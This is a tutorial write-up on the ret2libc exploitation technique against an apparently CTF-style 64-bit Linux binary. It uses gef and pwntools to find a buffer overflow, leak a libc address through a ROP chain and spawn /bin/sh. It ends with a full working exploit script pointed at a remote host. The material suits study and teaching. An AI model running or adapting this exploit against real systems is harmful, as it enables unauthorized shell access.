pwn> ret2libc by example

How to perform the attack against the binary with randomized addresses of libaries in memory - ret2libc & pwntools by example.

NOTICE I’m not very experienced in the “offensive RE” ~> pwns. If you will find some mistakes in my explainations, then please let me know in the comments :)

Prerequisites

exploitable (linux) binary
python3 + pwntools (I’m using it in virtualenv)
GDB + gef

# quick install
sudo apt install gdb python3 python3-pip

# install gef (https://github.com/hugsy/gef)
wget -O ~/.gdbinit-gef.py -q http://gef.blah.cat/py
echo source ~/.gdbinit-gef.py >> ~/.gdbinit

# install pwntools in virtualenv (https://docs.pwntools.com/en/stable/)
pip install virtualenv
virtualenv -p python3 venv
. ./venv/bin/activte
pip install pwntools

My exploitable binary have following properties:

gef➤  checksec
[+] checksec for 'binary'
Canary                        : ✘
NX                            : ✓
PIE                           : ✘
Fortify                       : ✘
RelRO                         : Full

Hunt for the exploitable code

This tutorial will focus only on binaries with enabled relocation, it will fully ignore the PIE or stack canaries.

The easiest way to find the exploitable code is actually to play with the binary, learn about it’s background. It is worth noticing that exploitable functionality will be triggered from somewhere where binary interacts with the user (receive & parse packets, user input, configs)

In my case the binary have only 4 “input fields” and only one of them allows to overwrite the allocated buffer:

// ida pseudo-code:
int fill()
{
  char buf[32]; // [rsp+0h] [rbp-20h] BYREF

  memset(buf, 0, sizeof(buf));
  printf("How much data do you want to store?\n> ")
  read(0, buf, 0x400uLL);                       // buffer can be overwritten
  return printf("\nEnjoy your %s", buf);
}

buf can handle only 32 bytes, but read can read 400, so we should be to fully fill the buffer and overwrite the return address. Stack looks like that:

+----------------+
|  return addr   |   <- saved address of return when call fill was exeuted
+----------------+
|   stored_rbp   |   <- saved RBP
+----------------+
|                |
|     buffer     |   <- local variables
|                |
+----------------+

Protip

ASM call <func> is contained from the 2 instructions: push $rip+1, jmp <func>, so it saves the address of the next instruction and performs jump to the called function.

ret is analogical, it consists of pop & jmp

Prove that you are in control

Next natural step is to verify that we actually can control the rip registry, the easiest way to achieve that is to run it in gdb with gef installed and generate the pattern:

gef➤  pattern create 60
[+] Generating a pattern of 60 bytes
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaa
[+] Saved as '$_gef0'

Protip

Generated pattern is using readable characters which are containing unique set of characters which can be easily located in the string for identifying the offset of specified substring.

Then just use generated payload as input data in potentially vulnerable functionality. In my case I had to navigate to the proper menu and paste the payload as choice option. As result the program crashed and gdb handled the exception:

> aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaa

Enjoy your aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaa

Program received signal SIGSEGV, Segmentation fault.
[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x49
$rbx   : 0x0
$rcx   : 0x0
$rdx   : 0x00007ffff7dd18c0  →  0x0000000000000000
$rsp   : 0x00007fffffffe278  →  "faaaaaaagaaaaaaahaaa\n"
$rbp   : 0x6161616161616165 ("eaaaaaaa"?)
$rsi   : 0x00007fffffffbbb0  →  "Enjoy your aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaa"
$rdi   : 0x1
$rip   : 0x0000000000400eec  →  <fill+162> ret
$r8    : 0x49
$r9    : 0x3d
$r10   : 0xffffffc3
$r11   : 0x246
$r12   : 0x00000000004006e0  →  <_start+0> xor ebp, ebp
$r13   : 0x00007fffffffe370  →  0x0000000000000001
$r14   : 0x0
$r15   : 0x0
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffe278│+0x0000: "faaaaaaagaaaaaaahaaa\n"     ← $rsp
0x00007fffffffe280│+0x0008: "gaaaaaaahaaa\n"
0x00007fffffffe288│+0x0010: 0x0000000a61616168 ("haaa\n"?)
0x00007fffffffe290│+0x0018: 0x0000000000401040  →  <__libc_csu_init+0> push r15
0x00007fffffffe298│+0x0020: 0x00007ffff7a05b97  →  <__libc_start_main+231> mov edi, eax
0x00007fffffffe2a0│+0x0028: 0x0000000000000001
0x00007fffffffe2a8│+0x0030: 0x00007fffffffe378  →  0x00007fffffffe5eb  →  "/tmp/binary"
0x00007fffffffe2b0│+0x0038: 0x0000000100008000
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
     0x400ee5 <fill+155>       call   0x400670 <printf@plt>
     0x400eea <fill+160>       nop
     0x400eeb <fill+161>       leave
 →   0x400eec <fill+162>       ret
[!] Cannot disassemble from $PC
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "binary", stopped 0x400eec in fill (), reason: SIGSEGV
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x400eec → fill()
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0x0000000000400eec in fill ()

Bingo! Program crashed because it tried to jump & execute instructions under the invalid address. Now you can find the address which overwritten return pointer:

gef➤  pattern offset $rsp
[+] Searching '$rsp'
[+] Found at offset 40 (little-endian search) likely
[+] Found at offset 33 (big-endian search)

Protip

We can find the address in rsp, because processor failed to execute ret instruction. rip still points to problematic instruction.

Protip

As argument for pattern offset you can also provide the string or hex number:

gef➤  pattern offset faaaaaaagaaaaaaahaa
[+] Searching 'faaaaaaagaaaaaaahaa'
[+] Found at offset 40 (big-endian search)

gef➤  pattern offset 0x6161616161616166
[+] Searching '0x6161616161616166'
[+] Found at offset 40 (little-endian search) likely
[+] Found at offset 33 (big-endian search)

Save the found offset (40 in my case), we will need it later.

Develop the exploit (ret2libc)

The ret2libc consists of several simple steps:

Leak the libc function’s address
Calculate the address of libc in memory
Redirect the execution flow to the leaked libc function such as system to execute the /bin/sh

Notice!

All steps needs to be performed during single program execution (due to the randomization). For this you need to have 2 vulnerable functions or just call the vulnerable code twice ;)

PWNtools: quick start

We are going to start from loading binaries (binary and libc) into the pwntools:

import pwn

p = pwn.process('./binary')
#p = pwn.remote("138.68.182.108", 30784)

pwn.context(os='linux', arch='amd64')
#pwn.context.log_level = 'debug'

elf = pwn.ELF("./binary")
libc = pwn.ELF("./libc.so.6")

Protip

If you want to perform this code remotely then uncomment pwn.remote (& comment pwn.process), for debug logs uncomment pwn.context.log_level = 'debug'.

Now we can pretty easily use the binaries meta information such us stored symbols, etc.

It might happen that vulnerable code is stored behind some menus, for navigation through program you can use several functions:

p.recvuntil("> ")  # receive stdout until this substring
p.recv(0xff)       # receive n number of bytes
p.recvline()       # receive stdout until new line

p.send(b'foo')     # send bytes
p.sendline(b'foo') # send 'foo\n' (with new line character)

# optionally use the timeout parameter to wait for output
p.recv(0xff, timeout=0.5)

Leak address

So, now you managed to load the binary, execute it and navigate to vulnerable functionallity.

Now it’s time to create the payload - the easiest way to achieve it is to use ROP module

In the code below I am constructing the ROP chain which will:

Fill the buffer (32 bytes)
Overwrite the saved base pointer on stack (8 bytes)
Call puts to leak GOT puts address
Redirect the execution flow to the same, vulnerable function (fill in my case)
Joins the fill bytes with ROP chain
Sends the payload

fill = b'A' * 40
rop = pwn.ROP(elf)
rop.call(elf.plt["puts"], [elf.got["puts"]])
rop.call(elf.symbols["fill"])
payload = b"".join([fill, rop.chain()])
p.sendline(payload)

Under the hood of rop.call

In different architectures functions are called using specific call conventions¹. For example in linux x8664: 1st argument of function is always passed via rdi registry. If we want to to call the function with argument we need to make sure that argument value is stored in the mentioned registry.

For that we create the ROP chain which will:

Jump to the code containing instructions taking the argument from stack and placing it in rdi (pop rdi).

Take address to jump from stack and jump to it (ret).

In general rop.call chain will look like that:<pop rdi; ret addr> <arg> <func_addr> (pwntools is capable of finding gadgets needed to call the function will all arguments).

PLT vs GOT²

PLT - Procedure Linkage Table, contain stubs to jump to the target

GOT - tables of the target addresses (resolved runtime)

You can find these values by yourself:
$ objdump -D ./binary| grep puts
0000000000400650 <puts@plt>:
  400650:       ff 25 52 19 20 00       jmpq   *0x201952(%rip)        # 601fa8 <puts@GLIBC_2.2.5>
...
We can interpret above output as:

PLT address = 0x400650

GOT entry = 0x601fa8

After sending such prepared payload to the program the stack should look like that:

+----------------+
|  ptr_plt_puts  |   <- pointer to puts function which will be executed
+----------------+
|  ptr_got_puts  |   <- address to entry of puts in GOT, value will be printed by puts above
+----------------+
|   ptr_poprdi   |   <- pointer to pop rdi; ret
+----------------+
|                |
|      fill      |   <- our "fill", which just overflows the buffer and saved rbp
|     (A*40)     |
|                |
+----------------+

Now we need to parse the output, this part is individual for each program. I really recommend enabling debugging output which will show transfered data.

Protip - Enable Debug Mode
pwn.context.log_level = 'debug'

# parse leaked address
raw_data = p.recvuntil('\n')
raw_data = raw_data.strip()  # \
raw_data = raw_data[-6:]     # - skip unnecesary data

leaked_puts = raw_data.ljust(8, b'\x00') # fill missing bytes with zeroes
leaked_puts = pwn.u64(leaked_puts)

Packing and Unpacking the bytes

pwntools contains built-in functions for packing and unpacking bytes - conversion of bytes between the strings and ints according to set environment with context function (endianness is set automatically).
>>> pwn.p64(0x4142424245464748)
b'HGFEBBBA'

>>> pwn.u64(b'HEXIFYIT')
6073483730898928968
# 0x5449594649584548

Run /bin/sh

The “last” step consists of the following substeps:

Calculate the address of libc in memory
Calculate the address of system() function and its argument ("/bin/sh")
Prepare the ropchain & pass it as argument

Ok, but why?

You might wondering here why not just call the system() directly in the previous step. It seems to be might simpler, than whole play with calling the same function once again.

The reason is simple: there is no system plt entry in our binary, so we can’t call it:
$ objdump -D ./binary| grep 'system'
# empty output
We don’t have it in our binary, so we need to find it in the memory by tracing common functions - in our case puts.

pwn.info("Stage 2, ret2shell")
# calculate offset, base address of the libc in the memory
libc.address = leaked_puts - libc.symbols['puts']

# prepare the final payload
rop = pwn.ROP(libc)
rop.call(rop.find_gadget(['ret'])) # just for fixing padding, you might not need it
rop.call(libc.symbols['system'], [next(libc.search(b"/bin/sh\x00"))]) # with null-byte to make sure that we don't try to execute some /bin/sh appended with garbage like '/bin/shFEFE' which obviously doesn't exists in linux
payload = b"".join([fill, rop.chain()])

p.sendline(payload)
p.interactive()

The last line (p.interactive()) spawns the interactive shell:

$ ps
  PID TTY          TIME CMD
   26 ?        00:00:00 binary
   27 ?        00:00:00 sh
   28 ?        00:00:00 sh

Full script

import pwn

#p = pwn.process('./binary')
p = pwn.remote("138.68.182.108", 30784)

pwn.context(os='linux', arch='amd64')
#pwn.context.log_level = 'debug'

elf = pwn.ELF("./binary")
libc = pwn.ELF("./libc.so.6")

pwn.info("Stage 1, leak puts addr")
p.recvuntil(...)
p.sendline(...)
p.recv(...)

# prepare payload
fill = b'A' * 40
rop = pwn.ROP(elf)
rop.call(elf.plt["puts"], [elf.got["puts"]])
rop.call(elf.symbols["fill"])
payload = b"".join([fill, rop.chain()])

p.sendline(payload)
p.recvuntil("Enjoy your ")

# extract leaked puts address
raw_data = p.recvuntil('\n')
raw_data = raw_data.strip()  # \
raw_data = raw_data[-6:]     # - skip unnecesary data

leaked_puts = raw_data.ljust(8, b'\x00') # fill missing bytes with zeroes
leaked_puts = pwn.u64(leaked_puts)
pwn.success(f'Leaked puts: {leaked_puts:x}')


pwn.info("Stage 2, ret2shell")
# calculate offset, base address of the libc in the memory
libc.address = leaked_puts - libc.symbols['puts']

# prepare the final payload
rop = pwn.ROP(libc)
rop.call(rop.find_gadget(['ret']))
rop.call(libc.symbols['system'], [next(libc.search(b"/bin/sh\x00"))])
payload = b"".join([fill, rop.chain()])

p.sendline(payload)
pwn.success("Have fun!")
p.interactive()

Prerequisites#

Hunt for the exploitable code#

Prove that you are in control#

Develop the exploit (ret2libc)#

PWNtools: quick start#

Leak address#

Run /bin/sh#

Full script#

References#